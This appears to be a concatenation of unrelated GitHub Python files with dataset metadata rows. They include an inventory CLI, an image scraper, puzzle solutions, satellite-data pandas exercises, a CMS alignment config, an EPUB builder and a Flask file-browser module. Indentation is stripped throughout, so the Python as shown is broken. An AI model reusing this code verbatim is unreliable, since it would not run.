-i, --interactive Interactive Mode
-h, --help Show this screen and exit.
"""
from docopt import docopt, DocoptExit
import cmd
import os
import sys
from pyfiglet import Figlet
from colorama import Fore, Back, Style, init
from inventory_management import Inventory
inventory = Inventory()
def docopt_cmd(func):
"""
This decorator is used to simplify the try/except block and pass the result
of the docopt parsing to the called action
"""
def fn(self, arg):
try:
opt = docopt(fn.__doc__, arg)
except DocoptExit as e:
# The DocoptExit is thrown when the args do not match
# We print a message to the user and the usage block
print('Invalid Command!')
print(e)
return
except SystemExit:
# The SystemExit exception prints the usage for --help
# We do not need to do the print here
return
return func(self, opt)
fn.__name__ = func.__name__
fn.__doc__ = func.__doc__
fn.__dict__.update(func.__dict__)
return fn
def intro():
print(__doc__)
class InventoryCLI(cmd.Cmd):
os.system("cls")
init()
font = Figlet(font = 'rev')
print (Fore.YELLOW + font.renderText('Inventory Manager'))
prompt = 'InventoryCLI >>> '
@docopt_cmd
def do_add(self, arg):
"""Usage: add <name> <description> <price> <date_added> <item_id>"""
name = arg["<name>"]
description = arg["<description>"]
price = arg["<price>"]
date_added = arg["<date_added>"]
item_id = arg["<item_id>"]
inventory.add_item(name, description, price, date_added, item_id)
@docopt_cmd
def do_remove(self, arg):
"""Usage: remove <item_id>"""
id = arg["<item_id>"]
inventory.remove_item(id)
@docopt_cmd
def do_list(self, arg):
"""Usage: list [--export]"""
inventory.list_all_remaining_stock()
@docopt_cmd
def do_item_view(self, arg):
"""Usage: item_view <item_id>"""
id_to_search_for = arg["<item_id>"]
inventory.item_view_id(id_to_search_for)
@docopt_cmd
def do_assetvalue(self, arg):
"""Usage: assetvalue"""
inventory.asset_value_of_inventory()
@docopt_cmd
def do_check_in(self, arg):
"""Usage: checkin <item_id>"""
check_in_item_id = arg["<item_id>"]
inventory.check_in_item(check_in_item_id)
@docopt_cmd
def do_check_out(self, arg):
"""Usage: checkout <item_id>"""
check_out_item_id = arg["<item_id>"]
inventory.check_out(check_out_item_id)
@docopt_cmd
def do_list_export(self, arg):
"""Usage: list_export <filename>"""
filename = arg["<filename>"]
inventory.list_export(filename)
@docopt_cmd
def do_search_inventory(self, arg):
"""Usage: search <item_name>"""
item_to_search = arg["<item_name>"]
inventory.search(item_to_search)
def do_quit(self, arg):
"""Usage: quit"""
os.system('clear')
print ('Application Exiting')
exit()
opt = docopt(__doc__,sys.argv[1:])
if opt["--interactive"]:
InventoryCLI().cmdloop()
print(opt)
| davidmukiibi/NewInventoryManagement | app.py | app.py | py | 3,710 | python | en | code | 0 | github-code | 13 |
39154370351 | import requests
from bs4 import BeautifulSoup
from urllib.request import urlopen as uReq
import os
save_dir='images/'
if not os.path.exists(save_dir):
os.mkdir(save_dir)
query=input('enter object name to scrap')
response=requests.get(f'https://www.google.com/search?q={query}&sca_esv=579625040&tbm=isch&source=hp&biw=1024&bih=588&ei=bKxHZcapO6bn2roPzvutyAc&iflsig=AO6bgOgAAAAAZUe6fQtT2TjyoqHotHqea5OPpeo7kChZ&ved=0ahUKEwjGj4e2jq2CAxWms1YBHc59C3kQ4dUDCAY&uact=5&oq=elon+musk&gs_lp=EgNpbWciCWVsb24gbXVzazIIEAAYgAQYsQMyCBAAGIAEGLEDMggQABiABBixAzIIEAAYgAQYsQMyCBAAGIAEGLEDMggQABiABBixAzIIEAAYgAQYsQMyCBAAGIAEGLEDMggQABiABBixAzIIEAAYgAQYsQNI5B9QkgtYtRtwAHgAkAEAmAHKAaABgg2qAQUwLjguMbgBA8gBAPgBAYoCC2d3cy13aXotaW1nqAIAwgIFEAAYgATCAggQABixAxiDAcICCxAAGIAEGLEDGIMBwgIEEAAYAw&sclient=img')
soup=BeautifulSoup(response.content,'html.parser')
image_tags=soup.find_all('img')
del image_tags[0]
for i in image_tags:
image_url=i['src']
image_data=requests.get(image_url).content
with open(os.path.join(save_dir,f'{query}_{image_tags.index(i)}.jpg'),'wb') as f:
f.write(image_data)
| Chatserohan/image-scrapper | scrapper.py | scrapper.py | py | 1,107 | python | en | code | 0 | github-code | 13 |
70852492178 | from aocd import data, submit
firstPolicyCount = 0
secondPolicyCount = 0
for line in data.splitlines():
policy, pwd = line.split(":")
pwd = pwd.strip()
limits, letter = policy.split(" ")
lower, upper = limits.split("-")
lower = int(lower)
upper = int(upper)
occurences = pwd.count(letter)
if lower <= occurences and occurences <= upper:
firstPolicyCount += 1
first = pwd[lower - 1]
second = pwd[upper - 1]
if first != second and (first == letter or second == letter):
secondPolicyCount += 1
submit(firstPolicyCount, part='a')
submit(secondPolicyCount, part='b')
| charvey/advent-of-code | 2020/02.py | 02.py | py | 627 | python | en | code | 0 | github-code | 13 |
18712304463 | # 单调栈
def dailyTemperatures(T: [int]) -> [int]:
n = len(T)
result = [0] * n
stack = []
for i in range(n):
while stack and T[stack[-1]] < T[i]:
tmp = stack.pop()
result[tmp] = i - tmp
stack.append(i)
return result
if __name__ == "__main__":
T = [73, 74, 75, 71, 69, 72, 76, 73]
result = dailyTemperatures(T)
print(result)
| russellgao/algorithm | dailyQuestion/2020/2020-06/06-11/python/solution_stack.py | solution_stack.py | py | 401 | python | en | code | 3 | github-code | 13 |
12181323596 | import numpy as np
def polygonValuesByID(ds, ids):
uniqueids = np.unique(ids[~np.isnan(ids)])
polygonvalues = {}
for polid in uniqueids:
polygonvalues[polid] = ds[ids == polid][0] #1 #### <<<< ----- CHANGED ----- >>>> ####
return polygonvalues
def statsByID(ds, ids, stat='sum'):
unique, counts = np.unique(np.unique(ids[~np.isnan(ids)]), return_counts=True)
counts = dict(zip(unique, counts))
stats = {}
for polid in counts:
if stat == 'sum':
stats[polid] = np.nansum(ds[ids == polid])
else:
print('Invalid statistic')
return stats
def extenddataset(X, y, ylr=np.array(None), transf=None):
if transf == '2T6':
auxtransf = np.random.randint(0, 5, X.shape[0])
newX = np.concatenate((X,
np.flip(X[auxtransf == 0, :, :, :], 1),
np.flip(X[auxtransf == 1, :, :, :], 2),
np.flip(X[auxtransf == 2, :, :, :], (1,2)),
np.transpose(X[auxtransf == 3, :, :, :], (0, 2, 1, 3)),
np.rot90(X[auxtransf == 4, :, :, :], axes=(1,2)),
np.rot90(X[auxtransf == 5, :, :, :], axes=(2,1))), axis=0)
newy = np.concatenate((y,
y[auxtransf == 0],
y[auxtransf == 1],
y[auxtransf == 2],
y[auxtransf == 3],
y[auxtransf == 4],
y[auxtransf == 5]))
if ylr.any(): newylr = np.concatenate((ylr,
ylr[auxtransf == 0],
ylr[auxtransf == 1],
ylr[auxtransf == 2],
ylr[auxtransf == 3],
ylr[auxtransf == 4],
ylr[auxtransf == 5]))
# auxtransfpos = np.random.choice(X.shape[0], round(X.shape[0]/2), replace=False)
# auxtransfcat = np.random.randint(0, 5, round(X.shape[0]/2))
# auxtransf = np.empty((X.shape[0]), dtype=int)
# auxtransf[auxtransfpos] = auxtransfcat
# newX = np.concatenate((newX,
# np.flip(X[auxtransf == 0, :, :, :], 1),
# np.flip(X[auxtransf == 1, :, :, :], 2),
# np.flip(X[auxtransf == 2, :, :, :], (1,2)),
# np.transpose(X[auxtransf == 4, :, :, :], (0, 2, 1, 3)),
# np.rot90(X[auxtransf == 3, :, :, :], axes=(1,2)),
# np.rot90(X[auxtransf == 5, :, :, :], axes=(2,1))), axis=0)
# newy = np.concatenate((newy,
# y[auxtransf == 0],
# y[auxtransf == 1],
# y[auxtransf == 2],
# y[auxtransf == 3],
# y[auxtransf == 4],
# y[auxtransf == 5]))
# if ylr.any(): newylr = np.concatenate((newylr,
# ylr[auxtransf == 0],
# ylr[auxtransf == 1],
# ylr[auxtransf == 2],
# ylr[auxtransf == 3],
# ylr[auxtransf == 4],
# ylr[auxtransf == 5]))
sids = np.random.choice(newX.shape[0], newX.shape[0], replace=False)
newX = newX[sids, :, :, :]
newy = newy[sids]
if ylr.any(): newylr = newylr[sids]
else:
newX = X
newy = y
newylr = ylr
if ylr.any():
return newX, newy, newylr
else:
return newX, newy
| mgeorgati/spDisag | SDis_Self-Training/utils/nputils.py | nputils.py | py | 4,032 | python | en | code | 2 | github-code | 13 |
19935635760 |
# coding: utf-8
# Download a Modis Aqua scene from http://modis.gsfc.nasa.gov/data/dataprod/
# In[32]:
from a212utils.download import download_file
from IPython.display import Image
import h5py
import pandas as pd
download = False
if download:
#
# satelite data for day 127 of 2014 Modis Aqua level 3 cloud data
#
url = 'http://clouds.eos.ubc.ca/~phil/Downloads/a212/fields.h5'
local_file = download_file(url)
print('downloaded {}'.format(local_file))
else:
local_file='fields.h5'
# In[33]:
get_ipython().magic('matplotlib inline')
from pathlib import Path
import a212data
picwidth = 800
datadir = a212data.__path__[0]
image_path = Path(datadir).joinpath('MYBRGB.A2014127.2110.005.2014128174940.jpg')
print(str(image_path))
Image(str(image_path),width=picwidth)
# Use [h5py](http://docs.h5py.org/en/latest/) to read the image data
# In[34]:
from a212utils.h5dump import dumph5
if download:
dumph5(local_file)
# In[35]:
with h5py.File(local_file,'r') as f:
file_dict = {}
vars = ['ch29','ch31','cloud_mask','phase']
for name in vars:
fullname = '/A2014127/{}'.format(name)
file_dict[name] = f[fullname][...]
file_dict.update(f.attrs.items())
# In[36]:
file_dict.keys()
# In[37]:
#
# make a 5 color palette
#
import seaborn as sns
from matplotlib.colors import ListedColormap, LinearSegmentedColormap
colors = ["royal blue", "baby blue", "eggshell", "burnt red", "soft pink"]
print([the_color for the_color in colors])
colors=[sns.xkcd_rgb[the_color] for the_color in colors]
pal=ListedColormap(colors,N=5)
# In[38]:
# #
# the A2014127.2110 scene is a descending orbit, so south is on top
# and west is on the right, need to rotate through 180 degrees
#
get_ipython().magic('matplotlib inline')
from matplotlib import pyplot as plt
fig,ax = plt.subplots(1,1,figsize = (10,10))
phase_rot=np.rot90(file_dict['phase'],2)
CS=ax.imshow(phase_rot,cmap=pal)
ax.set_title('ungridded phase map with 2 rotations')
cax=fig.colorbar(CS)
#
# we wrote the phase legend into the h5 attributes
# use it to label the color axis
#
labels=file_dict['phase_vals']
labels=labels.split(',')
ends=np.linspace(0,4,6)
centers=(ends[1:] + ends[:-1])/2.
cax.set_ticks(centers)
cax.set_ticklabels(labels)
# In[91]:
plt.close('all')
fig,ax=plt.subplots(1,1)
ax.hist(phase_rot.ravel())
ax.set_title('Gridded: Mask - 0 = Cloud,1 = 66% prob.\n Clear,2 = 95% prob. Clear,3 = 99% prob. Clear')
a=dict(one=1,two=2)
print(a)
a.loc['one',5:7]
b=make_tuple(a)
a.one
# In[40]:
plt.close('all')
from matplotlib.colors import Normalize
from numpy import ma
fig,ax=plt.subplots(1,1,figsize=(12,12))
colors=sns.color_palette('coolwarm')
pal=LinearSegmentedColormap.from_list('test',colors)
pal.set_bad('0.75') #75% grey
pal.set_over('r')
pal.set_under('k')
vmin= -5.
vmax= 5.
ch29 = np.rot90(file_dict['ch29'],2)
ch31 = np.rot90(file_dict['ch31'],2)
the_norm=Normalize(vmin=vmin,vmax=vmax,clip=False)
tdiff= ch29 - ch31
tdiff=ma.array(tdiff,mask=np.isnan(tdiff))
CS= ax.imshow(tdiff,cmap=pal,norm=the_norm)
cax=plt.colorbar(CS, ax = ax,extend='both')
cax.set_label('ch29 - ch31 brightnes temp (K)')
ax.set_title('TB 8 micron - TB 11 micron')
# ### For next Tuesday: check in a notebook that
#
# 1. Create a pandas Dataframe with 3 columns: phase, ch29, ch31 using rows
# 1100:1500 of the rotated image
#
# 2. Use groupby on the phase column to collect pixels with the same phase
#
# 3. Loop through each of the phases and calculate the mean ch29 and ch 31 values
# for that phase and the mean of the differences.
#
# 4. Write those results out as a new DataFrame with 5 columns (1 for each phase)
# and 1 row
# In[46]:
the_slice=slice(1100,1500)
column_data = dict(phase=phase_rot[the_slice,:].ravel(),ch29=ch29[the_slice,:].ravel(),ch31=ch31[the_slice,:].ravel())
# In[82]:
df_satellite = pd.DataFrame(column_data)
out = phase_rot[the_slice,:].flat
print(type(out))
df_satellite.columns
# In[88]:
groups=df_satellite.groupby('phase')
the_groups = list(groups)
print(the_groups)
# In[89]:
data_frames=[]
chan_dict={}
for value in ['ch29','ch31']:
chan_dict[value] = {}
for phase, group in groups:
#save the mean for each phase
chan_dict[value][phase] = group[value].mean()
df_dict={}
for value in ['ch29','ch31']:
temps=list(chan_dict[value].values())
names = list(chan_dict[value].keys())
df_dict[value] = pd.DataFrame.from_records([temps],columns=names)
df_dict['Tdiff'] = df_dict['ch31'] - df_dict['ch29']
# In[78]:
df_dict['Tdiff']
# ### For next week
#
# Check in a notebook that:
#
# 1) breaks the image into 16 subsets (4 x 4 in rows and columns)
#
# 2) write a function that produces a two new data frames for the the ch31 and ch31 - ch29 mean temperature
# that have a column for each phase and 16 rows, one for each subset.
#
# 3) Make a scatterplot with 4 symbols (one for each phase) that plots ch31 on the x axis and ch31 - ch29 on the y axis
# In[ ]:
| phaustin/A212 | notebooks/python/satellite_pandas.py | satellite_pandas.py | py | 5,014 | python | en | code | 2 | github-code | 13 |
12801156083 | from sys import stdin
from collections import deque
T = int(stdin.readline())
deltas = [(-2, -1), (-2, 1), (-1, 2), (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2)]
for _ in range(T):
l = int(stdin.readline())
startR, startC = map(int, stdin.readline().split())
endR, endC = map(int, stdin.readline().split())
distMap = [[0] * l for _ in range(l)]
queue = deque()
queue.append((startR, startC))
distMap[startR][startC] = 1
while queue:
r, c = queue.popleft()
if r == endR and c == endC:
print(distMap[r][c] - 1)
break
else:
for delR, delC in deltas:
nextR = r + delR
nextC = c + delC
if 0 <= nextR < l and 0 <= nextC < l and not distMap[nextR][nextC]:
distMap[nextR][nextC] = distMap[r][c] + 1
queue.append((nextR, nextC)) | HyunjoonCho/problem_solving | baekjoon/rhs-algorithm/06-graph/7562.py | 7562.py | py | 900 | python | en | code | 0 | github-code | 13 |
9765762776 | ########## Configuration ##########
# if set to True, a file with logs will be produced.
produce_logs = False
# if set to True, the process will load the conditions input from an SQLite file.
# Otherwise, it will use ESSource.
conditions_input_from_db = False
# Input database. Used only if conditions_input_from_db is set to True.
input_conditions = 'sqlite_file:alignment_config.db'
# Database tag. Used only if conditions_input_from_db is set to True.
db_tag = 'PPSAlignmentConfig_test'
# Path for a ROOT file with the histograms
output_distributions = 'dqm_run_distributions_test.root'
###################################
import FWCore.ParameterSet.Config as cms
from input_files import input_files
from Configuration.StandardSequences.Eras import eras
process = cms.Process('TEST', eras.Run2_2017)
# set GT
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, "112X_dataRun2_v6")
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load("CalibPPS.AlignmentGlobal.ppsAlignmentWorker_cfi")
process.ppsAlignmentWorker.debug = True
process.load("DQMServices.Core.DQMStore_cfi")
# Message Logger
if produce_logs:
process.MessageLogger = cms.Service("MessageLogger",
destinations = cms.untracked.vstring('run_distributions',
'cout'
),
run_distributions = cms.untracked.PSet(
threshold = cms.untracked.string("INFO")
),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING')
)
)
else:
process.MessageLogger = cms.Service("MessageLogger",
destinations = cms.untracked.vstring('cout'),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING')
)
)
# Source
process.source = cms.Source("PoolSource",
fileNames = input_files
)
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(-1))
# raw-to-digi conversion
process.load("EventFilter.CTPPSRawToDigi.ctppsRawToDigi_cff")
# local RP reconstruction chain with standard settings
process.load("RecoPPS.Configuration.recoCTPPS_cff")
process.ctppsLocalTrackLiteProducer.tagDiamondTrack = ""
process.ctppsLocalTrackLiteProducer.includeDiamonds = False
# Event Setup
if not conditions_input_from_db:
from config import ppsAlignmentConfigESSource
process.ppsAlignmentConfigESSource = ppsAlignmentConfigESSource
else:
process.load("CondCore.CondDB.CondDB_cfi")
process.CondDB.connect = input_conditions
process.PoolDBESSource = cms.ESSource("PoolDBESSource",
process.CondDB,
DumbStat = cms.untracked.bool(True),
toGet = cms.VPSet(cms.PSet(
record = cms.string('PPSAlignmentConfigRcd'),
tag = cms.string(db_tag)
))
)
# Output for the histograms
process.dqmOutput = cms.OutputModule("DQMRootOutputModule",
fileName = cms.untracked.string(output_distributions)
)
process.load("DQM.Integration.config.environment_cfi")
process.dqmEnv.subSystemFolder = "CTPPS"
process.dqmEnv.eventInfoFolder = "EventInfo"
process.dqmSaver.path = ""
process.dqmSaver.tag = "CTPPS"
process.path = cms.Path(
process.ctppsRawToDigi
* process.recoCTPPS
* process.ppsAlignmentWorker
)
process.end_path = cms.EndPath(
process.dqmOutput
+ process.dqmEnv
+ process.dqmSaver
)
process.schedule = cms.Schedule(
process.path,
process.end_path
) | MatiXOfficial/pps-alignment-data | 2017/phys-version-1/fill_6300/placeholder/run_distributions_cfg.py | run_distributions_cfg.py | py | 3,528 | python | en | code | 0 | github-code | 13 |
2086947871 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2023/5/20
# @Author : chaocai
import os
from ebooklib import epub
from zhconv import zhconv
from service import config, log
# 构造epub,方法有些长懒得拆先这样吧
def build_epub(book_data):
try:
path = config.read('epub_dir') + book_data.site + '/' + book_data.title + '.epub'
if not os.path.exists(config.read('epub_dir') + book_data.site):
os.makedirs(config.read('epub_dir') + book_data.site)
log.info(book_data.title + ",开始生成epub...")
book = epub.EpubBook()
# 元数据
book.set_identifier(book_data.id)
book.set_title(book_data.title)
book.set_language('cn')
if book_data.author:
book.add_author(book_data.author)
if book_data.introduction:
description = '\n'.join(book_data.introduction)
description = zhconv.convert(description, 'zh-hans') if config.read('convert_hans') else description
book.add_metadata('DC', 'description', description)
book.add_metadata('DC', 'source', book_data.site)
book.add_metadata('DC', 'rights', '本电子书由lightnovel-pydownloader制作生成,仅供个人使用,不得对外传播以及用于商业用途。')
if book_data.tags:
book.add_metadata('DC', 'subject', ','.join(book_data.tags))
if book_data.cover:
# 设置封面
book.set_cover("cover.jpg", open(book_data.cover[0], 'rb').read())
# 章节
chapters = book_data.chapter
if chapters:
book_chapters = []
for chapter_data in chapters:
chapter = epub.EpubHtml(title=chapter_data.title,
file_name=chapter_data.id + '_' + chapter_data.title + '.xhtml', lang='cn')
content = '\n'.join(chapter_data.content)
content = zhconv.convert(content, 'zh-hans') if config.read('convert_hans') else content
if config.read('least_words') > 0 and len(content) < config.read('least_words') \
and not chapter_data.pic:
continue
content_list = ['<p>' + item + '</p>' for item in content.split('\n')]
if chapter_data.pic:
for pic in chapter_data.pic:
image_content = open(pic, "rb").read()
if config.read('least_pic') > 0 and len(image_content) < config.read('least_pic'):
continue
image_name = pic.replace('\\', '/').split('/')[-1]
image_type = image_name.split('.')[-1]
image = epub.EpubImage(uid=image_name, file_name='Image/' + image_name,
media_type='image/' + image_type, content=image_content)
book.add_item(image)
# 章节末尾插入图片
content_list.append('<img src="%s"/>' % ('../Image/' + image_name))
chapter.content = ''.join(content_list)
book.add_item(chapter)
book_chapters.append(chapter)
# 目录和书脊
if book_chapters:
book.toc = book_chapters
book.spine = book_chapters
book.add_item(epub.EpubNcx())
book.add_item(epub.EpubNav())
# css
style = 'body { font-family: Times, Times New Roman, serif; }'
nav_css = epub.EpubItem(uid="style_nav", file_name="style/nav.css",
media_type="text/css", content=style)
book.add_item(nav_css)
# 保存
epub.write_epub(path, book)
log.info('epub已导出!')
except:
pass
| ilusrdbb/lightnovel-pydownloader | service/epub.py | epub.py | py | 3,835 | python | en | code | 12 | github-code | 13 |
9075804676 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import sys
import os
import os.path
import re
import shutil
import codecs
import threading
import string
import tarfile
import random
import datetime
import functools
from flask import current_app, send_from_directory, Response
from werkzeug.utils import cached_property
from sqlalchemy.exc import SQLAlchemyError
from .compat import PY_LEGACY, range
from .models import Metadata
from . import db
undescore_replace = '%s:underscore' % __name__
codecs.register_error(undescore_replace,
(lambda error: (u'_', error.start + 1))
if PY_LEGACY else
(lambda error: ('_', error.start + 1))
)
if not PY_LEGACY:
unicode = str
allMetadata = {}
class File(object):
re_charset = re.compile('; charset=(?P<charset>[^;]+)')
parent_class = None # none means current class
def __init__(self, path=None, app=None):
self.path = path
self.app = current_app if app is None else app
try:
self.meta = allMetadata[self.path]
except:
self.meta = Metadata.query.filter_by(path=self.path).one()
allMetadata.update({self.meta.path:self.meta})
def remove(self):
if not self.can_remove:
raise OutsideRemovableBase("File outside removable base")
if self.is_directory:
shutil.rmtree(self.path)
else:
os.unlink(self.path)
def download(self):
if self.is_directory:
stream = TarFileStream(
self.path,
self.app.config["directory_tar_buffsize"]
)
return Response(stream, mimetype="application/octet-stream")
directory, name = os.path.split(self.path)
return send_from_directory(directory, name, as_attachment=True)
def contains(self, filename):
return os.path.exists(os.path.join(self.path, filename))
def choose_filename(self, filename, attempts=999):
new_filename = filename
for attempt in range(2, attempts+1):
if not self.contains(new_filename):
return new_filename
new_filename = alternative_filename(filename, attempt)
while self.contains(new_filename):
new_filename = alternative_filename(filename)
return new_filename
def get_dir_size(self):
total_size = 0
for dirpath, dirnames, filenames in os.walk(self.path):
for f in filenames:
fp = os.path.join(dirpath, f)
total_size += os.path.getsize(fp)
return total_size
@property
def plugin_manager(self):
return self.app.extensions['plugin_manager']
@property
def default_action(self):
for action in self.actions:
if action.widget.place == 'link':
return action
endpoint = 'browse' if self.is_directory else 'open'
widget = self.plugin_manager.link_class.from_file(self)
return self.plugin_manager.action_class(endpoint, widget)
@cached_property
def actions(self):
return self.plugin_manager.get_actions(self)
@property
def can_download(self):
if self.meta.size > self.app.config["MAX_DIR_DL_SIZE"] and self.is_directory:
return False;
return self.app.config['directory_downloadable'] or not self.is_directory
@cached_property
def can_remove(self):
dirbase = self.app.config["directory_remove"]
if dirbase:
return self.path.startswith(dirbase + os.sep)
return False
@cached_property
def can_upload(self):
dirbase = self.app.config["directory_upload"]
if self.is_directory and dirbase:
return dirbase == self.path or self.path.startswith(dirbase + os.sep)
return False
@cached_property
def stats(self):
return os.stat(self.path)
@cached_property
def mimetype(self):
if self.is_directory:
return 'inode/directory'
return self.plugin_manager.get_mimetype(self.path)
@cached_property
def is_directory(self):
return os.path.isdir(self.path)
@cached_property
def is_file(self):
return os.path.isfile(self.path)
@cached_property
def is_empty(self):
return not self.raw_listdir
@cached_property
def parent(self):
if self.path == self.app.config['directory_base']:
return None
parent_class = self.parent_class or self.__class__
return parent_class(os.path.dirname(self.path), self.app)
@cached_property
def ancestors(self):
ancestors = []
parent = self.parent
while parent:
ancestors.append(parent)
parent = parent.parent
return tuple(ancestors)
@cached_property
def raw_listdir(self):
return os.listdir(self.path)
@property
def modified(self):
return datetime.datetime.fromtimestamp(self.stats.st_mtime).strftime('%Y.%m.%d %H:%M:%S')
def print_size(self, rawsize):
size, unit = fmt_size(rawsize, self.app.config["use_binary_multiples"])
if unit == binary_units[0]:
return "%d %s" % (size, unit)
return "%.2f %s" % (size, unit)
def get_rawsize(self):
rawsize = 0
if self.is_file:
rawsize = self.stats.st_size
if self.is_directory:
rawsize = self.get_dir_size()
return rawsize
def update_db_size(self, meta):
meta.size = self.get_rawsize()
meta.size_date = datetime.datetime.now()
db.session.add(meta)
db.session.commit()
return meta
@cached_property
def size(self):
#if self.meta.size and self.meta.size_date:
# if datetime.datetime.now() < self.meta.size_date + datetime.timedelta(days=21):
# return self.print_size(self.meta.size)
# else:
# self.meta = self.update_db_size(meta)
# return self.print_size(self.meta.size)
#else:
# self.meta = self.update_db_size(self.meta)
# return self.print_size(self.meta.size)
return self.print_size(self.meta.size)
@property
def urlpath(self):
return abspath_to_urlpath(self.path, self.app.config['directory_base'])
@property
def name(self):
return os.path.basename(self.path)
@property
def type(self):
return self.mimetype.split(";", 1)[0]
@cached_property
def description(self):
try:
return self.meta.desc
except:
return None
@property
def encoding(self):
if ";" in self.mimetype:
match = self.re_charset.search(self.mimetype)
gdict = match.groupdict() if match else {}
return gdict.get("charset") or "default"
return "default"
def listdir(self):
app = current_app
try:
ignored=app.config['directory_ignore']
except KeyError:
ignored = None
path_joiner = functools.partial(os.path.join, self.path)
content = [
self.__class__(path=path_joiner(path), app=self.app)
for path in self.raw_listdir
]
filtered_content = content
if ignored:
filtered_content = [c for c in content if c.name not in ignored]
filtered_content.sort(key=lambda f: (f.is_directory, f.name.lower()))
return filtered_content
@classmethod
def from_urlpath(cls, path, app=None):
app = app or current_app
base = app.config['directory_base']
return cls(path=urlpath_to_abspath(path, base), app=app)
class TarFileStream(object):
'''
Tarfile which compresses while reading for streaming.
Buffsize can be provided, it must be 512 multiple (the tar block size) for
compression.
'''
event_class = threading.Event
thread_class = threading.Thread
tarfile_class = tarfile.open
def __init__(self, path, buffsize=10240):
self.path = path
self.name = os.path.basename(path) + ".tar"
self._finished = 0
self._want = 0
self._data = bytes()
self._add = self.event_class()
self._result = self.event_class()
self._tarfile = self.tarfile_class(fileobj=self, mode="w|", bufsize=buffsize) # stream write
self._th = self.thread_class(target=self.fill)
self._th.start()
def fill(self):
self._tarfile.add(self.path, "")
self._tarfile.close() # force stream flush
self._finished += 1
if not self._result.is_set():
self._result.set()
def write(self, data):
self._add.wait()
self._data += data
if len(self._data) > self._want:
self._add.clear()
self._result.set()
return len(data)
def read(self, want=0):
if self._finished:
if self._finished == 1:
self._finished += 1
return ""
return EOFError("EOF reached")
# Thread communication
self._want = want
self._add.set()
self._result.wait()
self._result.clear()
if want:
data = self._data[:want]
self._data = self._data[want:]
else:
data = self._data
self._data = bytes()
return data
def __iter__(self):
data = self.read()
while data:
yield data
data = self.read()
class OutsideDirectoryBase(Exception):
pass
class OutsideRemovableBase(Exception):
pass
binary_units = ("B", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB")
standard_units = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
def fmt_size(size, binary=False):
'''
Get size and unit.
:param size: size in bytes
:param binary: whether use binary or standard units, defaults to True
:return: size and unit
:rtype: tuple of int and unit as str
'''
if binary:
fmt_sizes = binary_units
fmt_divider = 1024.
else:
fmt_sizes = standard_units
fmt_divider = 1000.
for fmt in fmt_sizes[:-1]:
if size < 1000:
return (size, fmt)
size /= fmt_divider
return size, fmt_sizes[-1]
def relativize_path(path, base, os_sep=os.sep):
'''
Make absolute path relative to an absolute base.
:param path: absolute path
:param base: absolute base path
:param os_sep: path component separator, defaults to current OS separator
:return: relative path
:rtype: str or unicode
:raises OutsideDirectoryBase: if path is not below base
'''
if not check_under_base(path, base, os_sep):
raise OutsideDirectoryBase("%r is not under %r" % (path, base))
prefix_len = len(base)
if not base.endswith(os_sep):
prefix_len += len(os_sep)
return path[prefix_len:]
def abspath_to_urlpath(path, base, os_sep=os.sep):
'''
Make filesystem absolute path uri relative using given absolute base path.
:param path: absolute path
:param base: absolute base path
:param os_sep: path component separator, defaults to current OS separator
:return: relative uri
:rtype: str or unicode
:raises OutsideDirectoryBase: if resulting path is not below base
'''
return relativize_path(path, base, os_sep).replace(os_sep, '/')
def urlpath_to_abspath(path, base, os_sep=os.sep):
'''
Make uri relative path fs absolute using a given absolute base path.
:param path: relative path
:param base: absolute base path
:param os_sep: path component separator, defaults to current OS separator
:return: absolute path
:rtype: str or unicode
:raises OutsideDirectoryBase: if resulting path is not below base
'''
prefix = base if base.endswith(os_sep) else base + os_sep
realpath = os.path.abspath(prefix + path.replace('/', os_sep))
if base == realpath or realpath.startswith(prefix):
return realpath
raise OutsideDirectoryBase("%r is not under %r" % (realpath, base))
common_path_separators = '\\/'
def generic_filename(path):
'''
Extract filename of given path os-indepently, taking care of known path separators.
:param path: path
:return: filename
:rtype: str or unicode (depending on given path)
'''
for sep in common_path_separators:
if sep in path:
_, path = path.rsplit(sep, 1)
return path
restricted_chars = '\\/\0'
def clean_restricted_chars(path, restricted_chars=restricted_chars):
'''
Get path without restricted characters.
:param path: path
:return: path without restricted characters
:rtype: str or unicode (depending on given path)
'''
for character in restricted_chars:
path = path.replace(character, '_')
return path
restricted_names = ('.', '..', '::', os.sep)
nt_device_names = ('CON', 'AUX', 'COM1', 'COM2', 'COM3', 'COM4', 'LPT1', 'LPT2', 'LPT3', 'PRN', 'NUL')
fs_encoding = 'unicode' if os.name == 'nt' else sys.getfilesystemencoding() or 'ascii'
def check_forbidden_filename(filename, destiny_os=os.name, fs_encoding=fs_encoding,
restricted_names=restricted_names):
'''
Get if given filename is forbidden for current OS or filesystem.
:param filename:
:param destiny_os: destination operative system
:param fs_encoding: destination filesystem filename encoding
:return: wether is forbidden on given OS (or filesystem) or not
:rtype: bool
'''
if destiny_os == 'nt':
fpc = filename.split('.', 1)[0].upper()
if fpc in nt_device_names:
return True
return filename in restricted_names
def check_under_base(path, base, os_sep=os.sep):
'''
Check if given absolute path is under given base.
:param path: absolute path
:param base: absolute base path
:return: wether file is under given base or not
:rtype: bool
'''
prefix = base if base.endswith(os_sep) else base + os_sep
return path == base or path.startswith(prefix)
def secure_filename(path, destiny_os=os.name, fs_encoding=fs_encoding):
'''
Get rid of parent path components and special filenames.
If path is invalid or protected, return empty string.
:param path: unsafe path
:param destiny_os: destination operative system
:param fs_encoding: destination filesystem filename encoding
:return: filename or empty string
:rtype: str or unicode (depending on python version, destiny_os and fs_encoding)
'''
path = generic_filename(path)
path = clean_restricted_chars(path)
if check_forbidden_filename(path, destiny_os=destiny_os, fs_encoding=fs_encoding):
return ''
if fs_encoding != 'unicode':
if PY_LEGACY and not isinstance(path, unicode):
path = unicode(path, encoding='latin-1')
path = path.encode(fs_encoding, errors=undescore_replace).decode(fs_encoding)
return path
fs_safe_characters = string.ascii_uppercase + string.digits
def alternative_filename(filename, attempt=None):
'''
Generates an alternative version of given filename.
If an number attempt parameter is given, will be used on the alternative
